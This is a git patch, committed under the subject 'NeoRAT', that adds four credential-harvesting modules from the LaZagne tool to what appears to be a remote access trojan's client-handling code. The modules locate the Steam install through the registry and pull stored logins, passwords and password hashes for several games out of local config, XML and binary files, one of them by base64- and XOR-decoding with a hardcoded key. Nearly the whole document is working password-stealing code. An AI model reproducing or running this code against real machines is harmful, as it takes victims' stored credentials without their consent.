From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../lazagne/softwares/games/__init__.py | 0 .../lazagne/softwares/games/galconfusion.py | 55 ++++++++++++++++++++++ .../lazagne/softwares/games/kalypsomedia.py | 42 +++++++++++++++++ .../lazagne/softwares/games/roguestale.py | 41 ++++++++++++++++ .../lazagne/softwares/games/turba.py | 55 ++++++++++++++++++++++ 5 files changed, 193 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/games/__init__.py create mode 100644 foreign/client_handling/lazagne/softwares/games/galconfusion.py create mode 100644 foreign/client_handling/lazagne/softwares/games/kalypsomedia.py create mode 100644 foreign/client_handling/lazagne/softwares/games/roguestale.py create mode 100644 foreign/client_handling/lazagne/softwares/games/turba.py (limited to 'foreign/client_handling/lazagne/softwares/games') diff --git a/foreign/client_handling/lazagne/softwares/games/__init__.py b/foreign/client_handling/lazagne/softwares/games/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/foreign/client_handling/lazagne/softwares/games/galconfusion.py b/foreign/client_handling/lazagne/softwares/games/galconfusion.py new file mode 100644 index 0000000..b4279c5 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/games/galconfusion.py @@ -0,0 +1,55 @@ +# -*- coding: utf-8 -*- + +import os + +try: + import _winreg as winreg +except ImportError: + import winreg + +import foreign.client_handling.lazagne.config.winstructure as win +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import string_to_unicode + + +class GalconFusion(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'galconfusion', 'games', registry_used=True) + + def run(self): + creds = [] + results = None + + # Find the location of steam - to make it easier we're going to use a try block + # 'cos I'm lazy + try: + with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key: + results = winreg.QueryValueEx(key, 'SteamPath') + except Exception: + pass + + if results: + steampath = string_to_unicode(results[0]) + userdata = os.path.join(steampath, u'userdata') + + # Check that we have a userdata directory + if not os.path.exists(userdata): + self.error(u'Steam doesn\'t have a userdata directory.') + return + + # Now look for Galcon Fusion in every user + for f in os.listdir(userdata): + filepath = os.path.join(userdata, string_to_unicode(f), u'44200\\remote\\galcon.cfg') + if not os.path.exists(filepath): + continue + + # If we're here we should have a Galcon Fusion file + with open(filepath, mode='rb') as cfgfile: + # We've found a config file, now extract the creds + data = cfgfile.read() + creds.append({ + 'Login': data[4:0x23], + 'Password': data[0x24:0x43] + }) + + return creds diff --git a/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py new file mode 100644 index 0000000..566aba7 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py @@ -0,0 +1,42 @@ +# -*- coding: utf-8 -*- +import base64 +import os + +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import char_to_int, chr_or_byte + +try: + from ConfigParser import ConfigParser # Python 2.7 +except ImportError: + from configparser import ConfigParser # Python 3 + + +class KalypsoMedia(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'kalypsomedia', 'games') + + def xorstring(self, s, k): + """ + xors the two strings + """ + return b''.join(chr_or_byte(char_to_int(x) ^ char_to_int(y)) for x, y in zip(s, k)) + + def run(self): + creds = [] + key = b'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' + inifile = os.path.join(constant.profile['APPDATA'], u'Kalypso Media\\Launcher\\launcher.ini') + + # The actual user details are stored in *.userdata files + if os.path.exists(inifile): + config = ConfigParser() + config.read(inifile) + + # get the encoded password + cookedpw = base64.b64decode(config.get('styx user', 'password')) + + creds.append({ + 'Login': config.get('styx user', 'login'), + 'Password': self.xorstring(cookedpw, key) + }) + return creds diff --git a/foreign/client_handling/lazagne/softwares/games/roguestale.py b/foreign/client_handling/lazagne/softwares/games/roguestale.py new file mode 100644 index 0000000..ded16eb --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/games/roguestale.py @@ -0,0 +1,41 @@ +# -*- coding: utf-8 -*- +import os +import re +from xml.etree.cElementTree import ElementTree + +from foreign.client_handling.lazagne.config.constant import constant +from foreign.client_handling.lazagne.config.module_info import ModuleInfo + + +class RoguesTale(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'roguestale', 'games') + + def run(self): + creds = [] + directory = constant.profile['USERPROFILE'] + u'\\Documents\\Rogue\'s Tale\\users' + + # The actual user details are stored in *.userdata files + if os.path.exists(directory): + files = os.listdir(directory) + + for f in files: + if re.match('.*\.userdata', f): + # We've found a user file, now extract the hash and username + + xmlfile = directory + '\\' + f + tree = ElementTree(file=xmlfile) + root = tree.getroot() + + # Double check to make sure that the file is valid + if root.tag != 'user': + self.warning(u'Profile %s does not appear to be valid' % f) + continue + + # Now save it to credentials + creds.append({ + 'Login': root.attrib['username'], + 'Hash': root.attrib['password'] + }) + + return creds diff --git a/foreign/client_handling/lazagne/softwares/games/turba.py b/foreign/client_handling/lazagne/softwares/games/turba.py new file mode 100644 index 0000000..f3604a8 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/games/turba.py @@ -0,0 +1,55 @@ +# -*- coding: utf-8 -*- + +import os + +try: + import _winreg as winreg +except ImportError: + import winreg + +import foreign.client_handling.lazagne.config.winstructure as win +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import string_to_unicode + + +class Turba(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'turba', 'games', registry_used=True) + + def run(self): + creds = [] + results = None + + # Find the location of steam - to make it easier we're going to use a try block + # 'cos I'm lazy + try: + with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: + results = winreg.QueryValueEx(key, 'SteamPath') + except Exception: + pass + + if results: + steampath = string_to_unicode(results[0]) + steamapps = os.path.join(steampath, u'SteamApps\common') + + # Check that we have a SteamApps directory + if not os.path.exists(steamapps): + self.error(u'Steam doesn\'t have a SteamApps directory.') + return + + filepath = os.path.join(steamapps, u'Turba\\Assets\\Settings.bin') + + if not os.path.exists(filepath): + self.debug(u'Turba doesn\'t appear to be installed.') + return + + # If we're here we should have a valid config file file + with open(filepath, mode='rb') as filepath: + # We've found a config file, now extract the creds + data = filepath.read() + chunk = data[0x1b:].split('\x0a') + creds.append({ + 'Login': chunk[0], + 'Password': chunk[1] + }) + return creds -- cgit v1.2.3